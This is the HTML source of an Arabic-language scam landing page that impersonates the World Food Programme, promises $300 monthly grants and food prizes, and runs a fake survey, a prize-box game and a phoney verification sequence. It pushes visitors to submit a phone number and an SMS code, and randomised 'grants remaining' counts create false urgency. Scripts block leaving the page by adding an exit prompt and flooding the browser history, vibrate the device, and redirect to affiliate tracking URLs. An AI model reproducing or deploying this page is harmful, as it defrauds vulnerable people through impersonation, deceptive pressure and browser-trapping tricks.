<!doctype html>
<html lang="en" dir="ltr">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>  منظمة الغذاء العالمى</title>
	<link rel="canonical" href="https://blabaneg.pages.dev" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="lander" content="survey-pick-a-box">
<meta name="description" content="survey-pick-a-box">
<link rel="shortcut icon" href="data:image/x-icon" type="image/x-icon">
<link href="css/app.css" type="text/css" rel="stylesheet" />
<link href="app.css" type="text/css" rel="stylesheet" />
<meta name="robots" content="noindex,nofollow">
<script defer data-domain="blaban" src="js/script.js"></script>
</head>
<body style="background: url('https://www2.0zz0.com/2024/11/24/22/530110150.png');background-repeat: no-repeat;background-size: cover;">
<div>
  <img src="https://www2.0zz0.com/2024/11/24/22/675580491.png" style="filter: drop-shadow(5px 5px 5px #242327);" width="160px" height="160px">
</div>
<div class="app" id="app" v-cloak>
<vue-modal v-show="!showRotator && !showPrize" :open="showOpeningModal" class="opening-modal">
<img class="opening-modal__image" src="https://www2.0zz0.com/2024/11/24/22/675580491.png" style="width: 165px;filter: drop-shadow(5px 5px 5px #242327);" alt="Apple iPhone 13 Pro Max" />
<h1 class="heading heading--h1">
!! تهانينا لك
</h1>
<p class="paragraph">يقدم برنامج الغذاء العالمي  إعانات نقدية وغذائية 300 دولار شهرياً  لكل فرد يتجاوز ال 16 عام وحتى ال 60 عام.لمدة ثلاثة أشهر وسلة غذائية لمساعدة المواطنين على تجاوز الأزمات
</p>
<p class="paragraph">
اضغط "موافق" للحصول على المنحه
</p>
<button class="button" v-on:click="showOpeningModal = false; $confetti.stop()">
موافق
</button>
</vue-modal>
<vue-modal :open="showInstructionsModal">
<img src="N49BUCH.png" style="width: 80px;">
<h2 class="heading heading--h1">تم حفظ إجاباتك بنجاح</h2>
<p class="paragraph">
الآن لديك فرصة للحصول على المنحه
<br><br>

✅سجل رقم هاتفك لنتمكن من التواصل معك
<br><br>
✅ستحصل على رمز رسالة تحتوي على الرقم اكتبه في المستمدة وأضغط نعم.</p>
<button class="button" onclick="go()">
استمرار
</button>
</vue-modal>
<vue-modal :open="showFailModal">
<h1 class="heading heading--h1">حظ أوفر في المرة القادمة</h1>
<p class="paragraph">
.لديك (2) فرص اضافية
</p>
<button class="button" v-on:click="showFailModal = false">
موافق
</button>
</vue-modal>
<vue-modal :open="showSuccessModal">
<img src="UarHZhk.png" style="width: 300px;">
<h1 class="heading heading--h1">!!تهانينا لك</h1>
<p class="paragraph">
انت الرابح معنا بجائزة <br><br> ٣ القنبلة + ٣ أزر بـ لبن + ٤ قشطوطة + ٣ كشري + ٤ ام علي <br><br>اتبع التعليمات التالية للحصول على جائزتك
</p>
<button class="button" onclick="go();">
استمرار
</button>
</vue-modal>
<div class="left" style="display: none;">
<div class="product-preview">
<div class="product-preview__title">
</div>
</div>
</div>
<div class="right" style="
border-radius: 20px;
">
<vue-box-picker v-if="showBoxPicker" :vertical-items="4"  lid-image="id.png" box-image="box.png" box-back-image="box-back.png" prize-image="img/prizes/iphone-13-pro-max/default@0.75x.png" v-on:fail="onBoxPickerFail" v-on:success="onBoxPickerSuccess" :horizontal-items="3" :max-clicks="2"></vue-box-picker>
<div class="verify" v-if="showRotator">
<style>
  #lolbox{grid-template-columns: repeat(4, 1fr);border-radius: 20px;border: 1px solid black;box-shadow: 7px 7px 20px white}
</style>
<vue-text-rotator id="lolbox" v-on:rotate="rotate" v-on:finished="onRotatorFinished" :strings='[
                     "... الرجاء الإنتظار قليلاً",
              "... الرجاء الإنتظار قليلاً",
              "... الرجاء الإنتظار قليلاً"
            ]'>
</vue-text-rotator>
<div class="verify__text" v-if="rotateIndex > 1">
<strong>
لقد قمت بالرد على جميع الأسئلة
</strong>
<img class="verify__icon verify__icon--checked" src="checked.png" alt="" />
</div>
<div class="verify__text" v-else>
جاري معالجة إجاباتك
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 0}" src="spinner.gif" alt="" />
</div>
<div class="verify__text" v-if="rotateIndex > 2">
<strong>
تم التسجيل فى المنحه بنجاح</strong>
<img class="verify__icon verify__icon--checked" src="checked.png" alt="" />
</div>
<div class="verify__text" v-else>
جاري التسجيل فى المنحه
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 1}" src="spinner.gif" alt="" />
</div>
<div class="verify__text" v-if="rotateIndex > 3">
<strong id="left-in">
    !تبقي 1294 منحه فقط
</strong>
<img class="verify__icon verify__icon--checked" src="checked.png" alt="" />
</div>
<div class="verify__text" v-else>
جاري فحص رقمك فى المنحه
<img class="verify__icon verify__icon--spinner" :class="{'verify__icon--visible' : rotateIndex > 2 }" src="spinner.gif" alt="" />
</div>
</div>
<vue-survey style="
border-radius: 20px;
border: 1px solid black;
box-shadow: 7px 7px 20px #502323;
" v-if="showSurvey" v-if="showSurvey" :show-steps="true" :questions='[
            {
              title: "ما هو جنسك ؟",
              answers: [ { text: "ذكر" }, { text: "آنثى" } ]
            },
            {
              title: "ما هو عمرك ؟",
              answers: [ { text: "اقل من 18" }, { text: "18-29" }, { text: "30-39" }, { text: "40-49" }, { text: "50+" } ]
            },
            {
              title: "هل سبق لك التقديم فى المنحه ؟",
              answers: [ { text: "نعم" }, { text: "لا" } ]
            },
            {
              title: "الحاله الاجتماعيه ؟",
              answers: [ { text: "اعزبً" }, { text: "متزوج" }, { text: "ارمل" }, { text: " مطلق" },  ]
            },
            {
              title: "العمل    ؟",
              answers: [ { text: "اعمل" }, { text: "لا اعمل" }, { text: "ربه منزل" }, { text: "طالب" } ]
            },
            {
              title: "هل لديك اطفال ؟",
              answers: [ { text: "نعم" }, { text: "لا" } ]
            },
          ]' v-on:finish="onSurveyFinish"></vue-survey>
</div>
</div>
<!-- <img src='https://i.ibb.co/0ZmyQP6/70898.jpg' width='80%'/> -->
<script>window.view = window.view || {};view.offerUrl = "https:\/\/rdr.funcontent.xyz/click";view.qs = null;view.skip = 0;view.screenshot = 0;view.download = 1;view.noredir = false;</script> <script src="js/app.js?id=d41d8cd98f00b204e980" type="application/javascript"></script>
<script src="app.js" type="application/javascript"></script>
<script>
function go() {
    window.onbeforeunload = null;
    window.location.href = 'https://www.worlsuperior.help/?sl=5877779-613d6&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}';
}
</script>
<script>
var PreventExitPop = true;
function ExitPop() {
    if (PreventExitPop != false) {
        return "Don't miss out!";
    }
}
window.onbeforeunload = ExitPop;
</script>
<script>
    ! function() {
    var t;
    try {
        const URL = window.location.href.split(/[#]/)[0];
        for (t = 0; 10 > t; ++t) history.pushState({}, "", URL + '#')
        onpopstate = function(event) {
            event.state &&
        }
    } catch (o) {
        console.log(o);
    }
}();
</script>
<script>
	navigator.vibrate([1000, 300, 1000, 300,1000]);
</script>
<script src="p.js" defer></script>
<script>
  // Function to generate a random number between 200 and 2000
  function getRandomNumber(min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
  }

  // Set the random number to the element with ID 'left-in'
  document.getElementById('left-in').innerText = `!تبقي ${getRandomNumber(200, 2000)} جائزة فقط`;
</script>
<noscript><img src="l3NimxL.png" width="1" height="1" /></noscript>
</html>